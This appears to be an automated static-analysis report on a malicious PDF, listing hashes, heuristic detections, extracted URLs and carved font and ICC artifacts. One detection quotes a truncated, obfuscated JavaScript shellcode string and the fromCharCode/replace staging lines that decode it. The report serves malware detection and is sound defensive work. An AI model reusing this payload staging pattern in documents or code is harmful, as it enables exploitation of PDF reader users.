Malicious PDF — malware analysis report

Static analysis result for SHA-256 e50d4dd1c2b707f7…

Verdict: MALICIOUS
File type: PDF

Size: 1.70 MB
Created: 2010-08-10 16:09:27 +08:00
Authoring application: Foxit PDF Creator Version 3.0.2.0506
First seen: 2026-05-10
MD5: 4098d427ee180c5d68f1dd87273d3f30
SHA-1: d7609e50b859c2b2d01ab445a4452363e3651010
SHA-256: e50d4dd1c2b707f7295aad6ddd4f342476460aa4787f43b0304d39d5eeb9d1a5
Risk score: 86

Machine Learning

  • Nyx PDF Classifier suspicious score 0.4319

Heuristics (4)

  • JavaScript action [low] (2 related findings) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster [critical] PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var forme1 = "@2deb@8358@04c0@c933@088b@9090@3390@33f6@8bff@83f0@0cc6@fe8b@3366@66d2@168b@d632@1788@c683@8302@01c7@e983@e301@eb17@e8e9@ffce@ffff@9090@9090@150b@0005@9090@9090@9090@9090@d184@71fa@fd11@30b1@26ca@3a3a@5d55@7a7a@1212@1175@04a5@c7f7@eaea@0707@4c4c@5dd6@0646@c8c4@e962@1c6c@a0bc@1eb3@56dd@7737@030b@cf46@4207@c73b@dd56@cd1d@bb30@7a38@4e72@6ee5@104c@ccce@c5bd@6467@d40e@129b@96cb@f60e@9e15@0942@9880@d853@7d26@af8f@b8bb@ef35@e3aa@0a81@685c@840f@7073@e095@778b@ae16@7b3c@9ffa@5e2a@90c0@93aa@ …
    var asT = String.fromCharCode(37,117);
    var forme2 = forme1.replace(/@/g,asT);
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://www.monotype.com (Monotype): referenced by PDF JavaScript
    • http://www.foxitsoftware.com: referenced by PDF JavaScript
    • http://www.monotype.com/html/mtname/ms_timesnewroman.html: referenced by PDF JavaScript
    • http://www.monotype.com/html/mtname/ms_welcome.html: referenced by PDF JavaScript
    • http://www.monotype.com/html/type/license.html: referenced by PDF JavaScript
    • http://www.microsoft.com/truetype/fonts/wingdings/: referenced by PDF JavaScript
    • http://www.microsoft.com/truetype/designers/bandh/: referenced by PDF JavaScript
    • http://www.monotype.com/html/mtname/ms_arial.html: referenced by PDF JavaScript
    • http://www.iec.ch: in PDF document text

Extracted artifacts (7)

Files carved from inside the sample during analysis. Each artifact's SHA-256 is listed on the line below it.

Filename                        Kind              Source                                   Size
icc_00_off000000b2.icc          pdf-icc-profile   PDF ICC profile at offset 0xB2           3144 bytes
  SHA-256: 2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e
font_00_sfnt_off00000c2b.bin    pdf-font-stream   PDF embedded font (sfnt) at offset 0xC2B     34872 bytes
  SHA-256: 83831dd521463c628ccf5326b2691f9f9e831e8babc26932321a4a5f7124936e
font_01_sfnt_off000065d1.bin    pdf-font-stream   PDF embedded font (sfnt) at offset 0x65D1    52748 bytes
  SHA-256: f27c297b9da0fead241168e20fba12b6892f2a4a6ac5a1901a54f733a4b106cc
font_02_sfnt_off0000f28d.bin    pdf-font-stream   PDF embedded font (sfnt) at offset 0xF28D    9696 bytes
  SHA-256: c869b49ceacdf99ae46dab3f76366706417a1d101856a104145e0440ad292ba1
font_03_sfnt_off00010695.bin    pdf-font-stream   PDF embedded font (sfnt) at offset 0x10695   13336 bytes
  SHA-256: 7d830b325f869950ddfd01daa675f402578dd99a87d67862120e347535416ab7
font_04_sfnt_off000123b3.bin    pdf-font-stream   PDF embedded font (sfnt) at offset 0x123B3   29592 bytes
  SHA-256: 3fa2cf1f95426906a95a6a9761c7eb9385ce6c6c5aaac164bd1e6da2fb1c9e67
font_05_sfnt_off00018263.bin    pdf-font-stream   PDF embedded font (sfnt) at offset 0x18263   15484 bytes
  SHA-256: f17dc23034f5d7335316bcceb62cc449fc05a4fcee4619c6dffc237c268b5f2e